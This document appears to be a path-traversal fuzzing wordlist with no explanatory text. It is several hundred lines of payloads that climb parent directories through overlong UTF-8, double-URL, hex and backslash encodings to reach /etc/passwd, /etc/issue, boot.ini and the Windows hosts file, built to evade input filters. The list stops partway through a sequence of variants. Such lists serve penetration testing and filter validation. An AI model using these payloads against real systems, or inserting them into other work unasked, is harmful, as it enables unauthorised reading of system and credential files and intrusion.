-..%01%e0%80%afboot.ini -..%01%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..%01%e0%80%af..%01%e0%80%afetc%e0%80%afpasswd -..%01%e0%80%af..%01%e0%80%afetc%e0%80%afissue -..%01%e0%80%af..%01%e0%80%afboot.ini -..%01%e0%80%af..%01%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afetc%e0%80%afpasswd -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afetc%e0%80%afissue -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afboot.ini -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afetc%e0%80%afpasswd -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afetc%e0%80%afissue -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afboot.ini -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afetc%e0%80%afpasswd -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afetc%e0%80%afissue -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afboot.ini -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afetc%e0%80%afpasswd -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afetc%e0%80%afissue -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afboot.ini -..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%af..%01%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..%01%25c1%259cetc%25c1%259cpasswd -..%01%25c1%259cetc%25c1%259cissue -..%01%25c1%259cboot.ini -..%01%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..%01%25c1%259c..%01%25c1%259cetc%25c1%259cpasswd -..%01%25c1%259c..%01%25c1%259cetc%25c1%259cissue -..%01%25c1%259c..%01%25c1%259cboot.ini -..%01%25c1%259c..%01%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cetc%25c1%259cpasswd -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cetc%25c1%259cissue -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cboot.ini -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cetc%25c1%259cpasswd -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cetc%25c1%259cissue -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cboot.ini -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cetc%25c1%259cpasswd -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cetc%25c1%259cissue -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cboot.ini -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cetc%25c1%259cpasswd -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cetc%25c1%259cissue -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cboot.ini -..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259c..%01%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..%01%25c0%25afetc%25c0%25afpasswd -..%01%25c0%25afetc%25c0%25afissue -..%01%25c0%25afboot.ini -..%01%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..%01%25c0%25af..%01%25c0%25afetc%25c0%25afpasswd -..%01%25c0%25af..%01%25c0%25afetc%25c0%25afissue -..%01%25c0%25af..%01%25c0%25afboot.ini -..%01%25c0%25af..%01%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afetc%25c0%25afpasswd -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afetc%25c0%25afissue -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afboot.ini -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afetc%25c0%25afpasswd -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afetc%25c0%25afissue -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afboot.ini -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afetc%25c0%25afpasswd -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afetc%25c0%25afissue -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afboot.ini -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afetc%25c0%25afpasswd -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afetc%25c0%25afissue -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afboot.ini -..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25af..%01%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..%01%f0%80%80%afetc%f0%80%80%afpasswd -..%01%f0%80%80%afetc%f0%80%80%afissue -..%01%f0%80%80%afboot.ini -..%01%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..%01%f0%80%80%af..%01%f0%80%80%afetc%f0%80%80%afpasswd -..%01%f0%80%80%af..%01%f0%80%80%afetc%f0%80%80%afissue -..%01%f0%80%80%af..%01%f0%80%80%afboot.ini -..%01%f0%80%80%af..%01%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afetc%f0%80%80%afpasswd -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afetc%f0%80%80%afissue -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afboot.ini -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afetc%f0%80%80%afpasswd -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afetc%f0%80%80%afissue -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afboot.ini -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afetc%f0%80%80%afpasswd -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afetc%f0%80%80%afissue -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afboot.ini -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afetc%f0%80%80%afpasswd -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afetc%f0%80%80%afissue -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afboot.ini -..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%af..%01%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..%01%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..%01%f8%80%80%80%afetc%f8%80%80%80%afissue -..%01%f8%80%80%80%afboot.ini -..%01%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..%01%f8%80%80%80%af..%01%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..%01%f8%80%80%80%af..%01%f8%80%80%80%afetc%f8%80%80%80%afissue -..%01%f8%80%80%80%af..%01%f8%80%80%80%afboot.ini -..%01%f8%80%80%80%af..%01%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afetc%f8%80%80%80%afissue -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afboot.ini -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afetc%f8%80%80%80%afissue -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afboot.ini -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afetc%f8%80%80%80%afissue -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afboot.ini -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afetc%f8%80%80%80%afissue -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afboot.ini -..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%af..%01%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.?/etc/passwd -.?/etc/issue -.?/boot.ini -.?/windows/system32/drivers/etc/hosts -.?/.?/etc/passwd -.?/.?/etc/issue -.?/.?/boot.ini -.?/.?/windows/system32/drivers/etc/hosts -.?/.?/.?/etc/passwd -.?/.?/.?/etc/issue -.?/.?/.?/boot.ini -.?/.?/.?/windows/system32/drivers/etc/hosts -.?/.?/.?/.?/etc/passwd -.?/.?/.?/.?/etc/issue -.?/.?/.?/.?/boot.ini -.?/.?/.?/.?/windows/system32/drivers/etc/hosts -.?/.?/.?/.?/.?/etc/passwd -.?/.?/.?/.?/.?/etc/issue -.?/.?/.?/.?/.?/boot.ini -.?/.?/.?/.?/.?/windows/system32/drivers/etc/hosts -.?/.?/.?/.?/.?/.?/etc/passwd -.?/.?/.?/.?/.?/.?/etc/issue -.?/.?/.?/.?/.?/.?/boot.ini -.?/.?/.?/.?/.?/.?/windows/system32/drivers/etc/hosts -.?\etc\passwd -.?\etc\issue -.?\boot.ini -.?\windows\system32\drivers\etc\hosts -.?\.?\etc\passwd -.?\.?\etc\issue -.?\.?\boot.ini -.?\.?\windows\system32\drivers\etc\hosts -.?\.?\.?\etc\passwd -.?\.?\.?\etc\issue -.?\.?\.?\boot.ini -.?\.?\.?\windows\system32\drivers\etc\hosts -.?\.?\.?\.?\etc\passwd -.?\.?\.?\.?\etc\issue -.?\.?\.?\.?\boot.ini -.?\.?\.?\.?\windows\system32\drivers\etc\hosts -.?\.?\.?\.?\.?\etc\passwd -.?\.?\.?\.?\.?\etc\issue -.?\.?\.?\.?\.?\boot.ini -.?\.?\.?\.?\.?\windows\system32\drivers\etc\hosts -.?\.?\.?\.?\.?\.?\etc\passwd -.?\.?\.?\.?\.?\.?\etc\issue -.?\.?\.?\.?\.?\.?\boot.ini -.?\.?\.?\.?\.?\.?\windows\system32\drivers\etc\hosts -.?%2fetc%2fpasswd -.?%2fetc%2fissue -.?%2fboot.ini -.?%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.?%2f.?%2fetc%2fpasswd -.?%2f.?%2fetc%2fissue -.?%2f.?%2fboot.ini -.?%2f.?%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.?%2f.?%2f.?%2fetc%2fpasswd -.?%2f.?%2f.?%2fetc%2fissue -.?%2f.?%2f.?%2fboot.ini -.?%2f.?%2f.?%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.?%2f.?%2f.?%2f.?%2fetc%2fpasswd -.?%2f.?%2f.?%2f.?%2fetc%2fissue -.?%2f.?%2f.?%2f.?%2fboot.ini -.?%2f.?%2f.?%2f.?%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.?%2f.?%2f.?%2f.?%2f.?%2fetc%2fpasswd -.?%2f.?%2f.?%2f.?%2f.?%2fetc%2fissue -.?%2f.?%2f.?%2f.?%2f.?%2fboot.ini -.?%2f.?%2f.?%2f.?%2f.?%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.?%2f.?%2f.?%2f.?%2f.?%2f.?%2fetc%2fpasswd -.?%2f.?%2f.?%2f.?%2f.?%2f.?%2fetc%2fissue -.?%2f.?%2f.?%2f.?%2f.?%2f.?%2fboot.ini -.?%2f.?%2f.?%2f.?%2f.?%2f.?%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.?%5cetc%5cpasswd -.?%5cetc%5cissue -.?%5cboot.ini -.?%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.?%5c.?%5cetc%5cpasswd -.?%5c.?%5cetc%5cissue -.?%5c.?%5cboot.ini -.?%5c.?%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.?%5c.?%5c.?%5cetc%5cpasswd -.?%5c.?%5c.?%5cetc%5cissue -.?%5c.?%5c.?%5cboot.ini -.?%5c.?%5c.?%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.?%5c.?%5c.?%5c.?%5cetc%5cpasswd -.?%5c.?%5c.?%5c.?%5cetc%5cissue -.?%5c.?%5c.?%5c.?%5cboot.ini -.?%5c.?%5c.?%5c.?%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.?%5c.?%5c.?%5c.?%5c.?%5cetc%5cpasswd -.?%5c.?%5c.?%5c.?%5c.?%5cetc%5cissue -.?%5c.?%5c.?%5c.?%5c.?%5cboot.ini -.?%5c.?%5c.?%5c.?%5c.?%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.?%5c.?%5c.?%5c.?%5c.?%5c.?%5cetc%5cpasswd -.?%5c.?%5c.?%5c.?%5c.?%5c.?%5cetc%5cissue -.?%5c.?%5c.?%5c.?%5c.?%5c.?%5cboot.ini -.?%5c.?%5c.?%5c.?%5c.?%5c.?%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.?0x2fetc0x2fpasswd -.?0x2fetc0x2fissue -.?0x2fboot.ini -.?0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.?0x2f.?0x2fetc0x2fpasswd -.?0x2f.?0x2fetc0x2fissue -.?0x2f.?0x2fboot.ini -.?0x2f.?0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.?0x2f.?0x2f.?0x2fetc0x2fpasswd -.?0x2f.?0x2f.?0x2fetc0x2fissue -.?0x2f.?0x2f.?0x2fboot.ini -.?0x2f.?0x2f.?0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.?0x2f.?0x2f.?0x2f.?0x2fetc0x2fpasswd -.?0x2f.?0x2f.?0x2f.?0x2fetc0x2fissue -.?0x2f.?0x2f.?0x2f.?0x2fboot.ini -.?0x2f.?0x2f.?0x2f.?0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.?0x2f.?0x2f.?0x2f.?0x2f.?0x2fetc0x2fpasswd -.?0x2f.?0x2f.?0x2f.?0x2f.?0x2fetc0x2fissue -.?0x2f.?0x2f.?0x2f.?0x2f.?0x2fboot.ini -.?0x2f.?0x2f.?0x2f.?0x2f.?0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.?0x2f.?0x2f.?0x2f.?0x2f.?0x2f.?0x2fetc0x2fpasswd -.?0x2f.?0x2f.?0x2f.?0x2f.?0x2f.?0x2fetc0x2fissue -.?0x2f.?0x2f.?0x2f.?0x2f.?0x2f.?0x2fboot.ini -.?0x2f.?0x2f.?0x2f.?0x2f.?0x2f.?0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.?0x5cetc0x5cpasswd -.?0x5cetc0x5cissue -.?0x5cboot.ini -.?0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.?0x5c.?0x5cetc0x5cpasswd -.?0x5c.?0x5cetc0x5cissue -.?0x5c.?0x5cboot.ini -.?0x5c.?0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.?0x5c.?0x5c.?0x5cetc0x5cpasswd -.?0x5c.?0x5c.?0x5cetc0x5cissue -.?0x5c.?0x5c.?0x5cboot.ini -.?0x5c.?0x5c.?0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.?0x5c.?0x5c.?0x5c.?0x5cetc0x5cpasswd -.?0x5c.?0x5c.?0x5c.?0x5cetc0x5cissue -.?0x5c.?0x5c.?0x5c.?0x5cboot.ini -.?0x5c.?0x5c.?0x5c.?0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.?0x5c.?0x5c.?0x5c.?0x5c.?0x5cetc0x5cpasswd -.?0x5c.?0x5c.?0x5c.?0x5c.?0x5cetc0x5cissue -.?0x5c.?0x5c.?0x5c.?0x5c.?0x5cboot.ini -.?0x5c.?0x5c.?0x5c.?0x5c.?0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.?0x5c.?0x5c.?0x5c.?0x5c.?0x5c.?0x5cetc0x5cpasswd -.?0x5c.?0x5c.?0x5c.?0x5c.?0x5c.?0x5cetc0x5cissue -.?0x5c.?0x5c.?0x5c.?0x5c.?0x5c.?0x5cboot.ini -.?0x5c.?0x5c.?0x5c.?0x5c.?0x5c.?0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.?%252fetc%252fpasswd -.?%252fetc%252fissue -.?%252fboot.ini -.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.?%252f.?%252fetc%252fpasswd -.?%252f.?%252fetc%252fissue -.?%252f.?%252fboot.ini -.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.?%252f.?%252f.?%252fetc%252fpasswd -.?%252f.?%252f.?%252fetc%252fissue -.?%252f.?%252f.?%252fboot.ini -.?%252f.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.?%252f.?%252f.?%252f.?%252fetc%252fpasswd -.?%252f.?%252f.?%252f.?%252fetc%252fissue -.?%252f.?%252f.?%252f.?%252fboot.ini -.?%252f.?%252f.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.?%252f.?%252f.?%252f.?%252f.?%252fetc%252fpasswd -.?%252f.?%252f.?%252f.?%252f.?%252fetc%252fissue -.?%252f.?%252f.?%252f.?%252f.?%252fboot.ini -.?%252f.?%252f.?%252f.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.?%252f.?%252f.?%252f.?%252f.?%252f.?%252fetc%252fpasswd -.?%252f.?%252f.?%252f.?%252f.?%252f.?%252fetc%252fissue -.?%252f.?%252f.?%252f.?%252f.?%252f.?%252fboot.ini -.?%252f.?%252f.?%252f.?%252f.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.?%255cetc%255cpasswd -.?%255cetc%255cissue -.?%255cboot.ini -.?%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.?%255c.?%255cetc%255cpasswd -.?%255c.?%255cetc%255cissue -.?%255c.?%255cboot.ini -.?%255c.?%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.?%255c.?%255c.?%255cetc%255cpasswd -.?%255c.?%255c.?%255cetc%255cissue -.?%255c.?%255c.?%255cboot.ini -.?%255c.?%255c.?%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.?%255c.?%255c.?%255c.?%255cetc%255cpasswd -.?%255c.?%255c.?%255c.?%255cetc%255cissue -.?%255c.?%255c.?%255c.?%255cboot.ini -.?%255c.?%255c.?%255c.?%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.?%255c.?%255c.?%255c.?%255c.?%255cetc%255cpasswd -.?%255c.?%255c.?%255c.?%255c.?%255cetc%255cissue -.?%255c.?%255c.?%255c.?%255c.?%255cboot.ini -.?%255c.?%255c.?%255c.?%255c.?%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.?%255c.?%255c.?%255c.?%255c.?%255c.?%255cetc%255cpasswd -.?%255c.?%255c.?%255c.?%255c.?%255c.?%255cetc%255cissue -.?%255c.?%255c.?%255c.?%255c.?%255c.?%255cboot.ini -.?%255c.?%255c.?%255c.?%255c.?%255c.?%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.?%c0%2fetc%c0%2fpasswd -.?%c0%2fetc%c0%2fissue -.?%c0%2fboot.ini -.?%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.?%c0%2f.?%c0%2fetc%c0%2fpasswd -.?%c0%2f.?%c0%2fetc%c0%2fissue -.?%c0%2f.?%c0%2fboot.ini -.?%c0%2f.?%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.?%c0%2f.?%c0%2f.?%c0%2fetc%c0%2fpasswd -.?%c0%2f.?%c0%2f.?%c0%2fetc%c0%2fissue -.?%c0%2f.?%c0%2f.?%c0%2fboot.ini -.?%c0%2f.?%c0%2f.?%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fetc%c0%2fpasswd -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fetc%c0%2fissue -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fboot.ini -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fetc%c0%2fpasswd -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fetc%c0%2fissue -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fboot.ini -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fetc%c0%2fpasswd -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fetc%c0%2fissue -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fboot.ini -.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2f.?%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.?%c0%afetc%c0%afpasswd -.?%c0%afetc%c0%afissue -.?%c0%afboot.ini -.?%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.?%c0%af.?%c0%afetc%c0%afpasswd -.?%c0%af.?%c0%afetc%c0%afissue -.?%c0%af.?%c0%afboot.ini -.?%c0%af.?%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.?%c0%af.?%c0%af.?%c0%afetc%c0%afpasswd -.?%c0%af.?%c0%af.?%c0%afetc%c0%afissue -.?%c0%af.?%c0%af.?%c0%afboot.ini -.?%c0%af.?%c0%af.?%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.?%c0%af.?%c0%af.?%c0%af.?%c0%afetc%c0%afpasswd -.?%c0%af.?%c0%af.?%c0%af.?%c0%afetc%c0%afissue -.?%c0%af.?%c0%af.?%c0%af.?%c0%afboot.ini -.?%c0%af.?%c0%af.?%c0%af.?%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%afetc%c0%afpasswd -.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%afetc%c0%afissue -.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%afboot.ini -.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%afetc%c0%afpasswd -.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%afetc%c0%afissue -.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%afboot.ini -.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%af.?%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.?%c0%5cetc%c0%5cpasswd -.?%c0%5cetc%c0%5cissue -.?%c0%5cboot.ini -.?%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.?%c0%5c.?%c0%5cetc%c0%5cpasswd -.?%c0%5c.?%c0%5cetc%c0%5cissue -.?%c0%5c.?%c0%5cboot.ini 